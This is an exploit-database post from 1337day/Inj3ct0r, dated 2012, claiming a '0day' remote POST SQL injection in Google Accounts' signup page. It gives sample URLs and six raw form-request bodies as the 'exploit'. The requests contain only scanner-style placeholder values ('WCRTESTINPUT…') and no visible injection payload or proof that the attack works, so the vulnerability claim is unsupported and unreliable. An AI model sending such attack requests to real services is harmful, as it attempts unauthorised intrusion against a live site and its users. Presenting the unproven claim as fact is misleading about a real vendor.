Google Accounts - Remote Post SQL Injection Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
| C _:_ A |   Google Accounts - Remote Post SQL Injection      | C _:_ A |
--------------------------------------------------------------------------

==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org 
--- omar-taurus[at]live[dot]com
 
===> INFO:
Author        : TAURUS OMAR
Category      : Webapps / 0day 
Title Exploit : Google Accounts - Remote Post SQL Injection 
Vendor        : Google Accounts
URL Vendor    : https://accounts.google.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase 

==> SAMPLE REMOTE POST SQL INJECTION
https://accounts.google.com/SignUp?dsh=-3394680781346882451 [ Remote Post SQL Injection ]
https://accounts.google.com/SignUp?dsh=-770862407476176606 [ Remote Post SQL Injection ]
https://accounts.google.com/SignUp?dsh=-5017265924696190063 [ Remote Post SQL Injection ]

==> EXPLOIT'S
+service^FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&signuptoken_audio=03AHJ_Vutn2Vtf6cCvpXUFF6vSBmirO_hh8szeKcy1tVu-7BzjzIoW97GW3YJ_ID_6pBrFSCLW3RN87sV0L9r8tBaYo28KwQYeDiTYq423bG4ruBWQoesuFxYnIDWCgpgJLZHxq8Rpv2cO_o3RGw-K6wpqvzBSKgxUMOV6v9CUtVs5YybVL0Exo3HRHfPmCj1ZltSg747kQOdunPf45ondqCppfGgLJPxiMl0BMSt6Sn3QZGgeVtMp7N4&signupcaptchaStats=tI6dAp5ZN72-M5FAITF-5HT_Lo24fSX-3Kg1yBkdTy0:DKNJ4Hd39irFXaNhiJ6Hzw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964525237&secTok=.AG5fkS9GBXZIxFHkrNQr-ou2fUsVmHpnUw==&dsh=-3394680781346882451&ktl=&ktf=&_utf8=&#9731;&bgresponse=js_disabled

+service^BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&signuptoken_audio=03AHJ_VuszKJ0XiQRiVFzfWHDCfI2vaYv7nW9WufYZ6VzVxWvCs6aPx6a3h2xaIIWl-BC8zKBbKLdEK64pOgijAHZlhkaukhM71nwWyStbox5W9YvniB3tosFATLxxY-oe0aiXKWTmSOlx_-Ols2J1VssMo5SDVxOvHZ5V1c8qt_eLVFOttue12mqrLr4Y_FY3TKJkL2uxwPpZKKA5CMb_-9-dhARQBmq00g&signupcaptchaStats=nff7Jgmbb5-B-4CCMAxFrHT_Lo24fSX-3Kg1yBkdTy0:r3Jh83qi797Sgs363bSzuw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964709751&secTok=.AG5fkS9lhHkOYclS4_VC6q_tROYinHqGAg==&dsh=-770862407476176606&ktl=&ktf=&_utf8=&#9731;&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=1

+service^Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964709751&secTok=.AG5fkS9lhHkOYclS4_VC6q_tROYinHqGAg==&dsh=-770862407476176606&ktl=&ktf=&_utf8=&#9731;&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&signuptoken_audio=03AHJ_VuszKJ0XiQRiVFzfWHDCfI2vaYv7nW9WufYZ6VzVxWvCs6aPx6a3h2xaIIWl-BC8zKBbKLdEK64pOgijAHZlhkaukhM71nwWyStbox5W9YvniB3tosFATLxxY-oe0aiXKWTmSOlx_-Ols2J1VssMo5SDVxOvHZ5V1c8qt_eLVFOttue12mqrLr4Y_FY3TKJkL2uxwPpZKKA5CMb_-9-dhARQBmq00g&signupcaptchaStats=nff7Jgmbb5-B-4CCMAxFrHT_Lo24fSX-3Kg1yBkdTy0:r3Jh83qi797Sgs363bSzuw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next step&BirthMonth=01

+service^recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964709751&secTok=.AG5fkS9lhHkOYclS4_VC6q_tROYinHqGAg==&dsh=-770862407476176606&ktl=&ktf=&_utf8=&#9731;&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&signuptoken_audio=03AHJ_VuszKJ0XiQRiVFzfWHDCfI2vaYv7nW9WufYZ6VzVxWvCs6aPx6a3h2xaIIWl-BC8zKBbKLdEK64pOgijAHZlhkaukhM71nwWyStbox5W9YvniB3tosFATLxxY-oe0aiXKWTmSOlx_-Ols2J1VssMo5SDVxOvHZ5V1c8qt_eLVFOttue12mqrLr4Y_FY3TKJkL2uxwPpZKKA5CMb_-9-dhARQBmq00g&signupcaptchaStats=nff7Jgmbb5-B-4CCMAxFrHT_Lo24fSX-3Kg1yBkdTy0:r3Jh83qi797Sgs363bSzuw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA

+service^service=&timeStmp=1339964525237&secTok=.AG5fkS9GBXZIxFHkrNQr-ou2fUsVmHpnUw==&dsh=-3394680781346882451&ktl=&ktf=&_utf8=&#9731;&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&signuptoken_audio=03AHJ_Vutn2Vtf6cCvpXUFF6vSBmirO_hh8szeKcy1tVu-7BzjzIoW97GW3YJ_ID_6pBrFSCLW3RN87sV0L9r8tBaYo28KwQYeDiTYq423bG4ruBWQoesuFxYnIDWCgpgJLZHxq8Rpv2cO_o3RGw-K6wpqvzBSKgxUMOV6v9CUtVs5YybVL0Exo3HRHfPmCj1ZltSg747kQOdunPf45ondqCppfGgLJPxiMl0BMSt6Sn3QZGgeVtMp7N4&signupcaptchaStats=tI6dAp5ZN72-M5FAITF-5HT_Lo24fSX-3Kg1yBkdTy0:DKNJ4Hd39irFXaNhiJ6Hzw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF

+service^secTok=.AG5fkS9jC2B0P7HTFpzGdwnc6CF9ZIyI2w==&dsh=-5017265924696190063&ktl=&ktf=&_utf8=&#9731;&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_VuvcMBtty9sszn1ZlYM65XZ_D5SVpCaInTeil9iTwox2fkIF-F-69dUkd0wxCVBSAeM-iYEkJsdX8gpQPJEC1dMSr-lOPOsJnrLcDiDGGM1MM5imRLcyLsGDHvNRbyPA-GmT8Rf7m4Lt7g30jz_1X2I9NNxqxg&signuptoken_audio=03AHJ_VuuAW2-omUNFAeRVjGubMnzfNT8d1sxOBoMrznM6XiZOjKzpwLiStM06K6t5JJyDoAhW0fK-ake2BHZLbAA-zzhO7XqR9V6QrED2-RPTRlVi50yXz1uMxISD1eI0hx9ranxhDSlnf0ML0Vhnei4bVWUEhGVLwVtGqJrCnRrhnTLZgxsWkrgEyLl1V8-01fRP2XHAnVknzf8aSz4StTvi35rB-hupi2UcOrfKaFTWbGDJFdbbH2A&signupcaptchaStats=vnxd_QEB93Y5tPg4SEBt9HT_Lo24fSX-3Kg1yBkdTy0:sb-sZtSa8xC_H1KqfmjUkw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_VuvcMBtty9sszn1ZlYM65XZ_D5SVpCaInTeil9iTwox2fkIF-F-69dUkd0wxCVBSAeM-iYEkJsdX8gpQPJEC1dMSr-lOPOsJnrLcDiDGGM1MM5imRLcyLsGDHvNRbyPA-GmT8Rf7m4Lt7g30jz_1X2I9NNxqxg&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&continue=https://accounts.google.com/ManageAccount&timeStmp=1339964528546



# 1337day.com [2012-06-18]